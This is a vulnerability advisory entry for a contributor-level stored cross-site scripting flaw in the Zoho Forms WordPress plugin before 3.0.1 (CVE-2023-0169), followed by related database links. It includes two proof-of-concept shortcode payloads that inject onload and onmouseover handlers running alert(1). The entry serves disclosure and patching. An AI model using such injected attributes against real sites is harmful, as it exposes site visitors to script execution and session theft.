Lucene search
Lana CodesWPEX-ID:178D71F2-4666-4F7E-ADA5-CB72A50FD663HistoryJan 23, 2023 - 12:00 a.m.
Zoho Forms < 3.0.1 - Contributor+ Stored XSS
2023-01-2300:00:00
Lana Codes
160
zoho forms contributor exploit stored xss vulnerability
EPSS
0.003
Percentile
70.4%
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
As a contributor, put the following in a blog post, and preview it:
[zohoForms src='" onload="alert(1)"']
[zohoForms src='http://localhost/" onmouseover="alert(1)"']Related
wpvulndb
wpvulndb
Zoho Forms < 3.0.1 - Contributor+ Stored XSS
2023-01-23 00:00:00
nvd
nvd
CVE-2023-0169
2023-02-13 15:15:20
cve
cve
CVE-2023-0169
2023-02-13 15:15:20
cvelist
cvelist
CVE-2023-0169 Zoho Forms < 3.0.1 - Contributor+ Stored XSS
2023-02-13 14:32:11
prion
prion
Cross site scripting
2023-02-13 15:15:00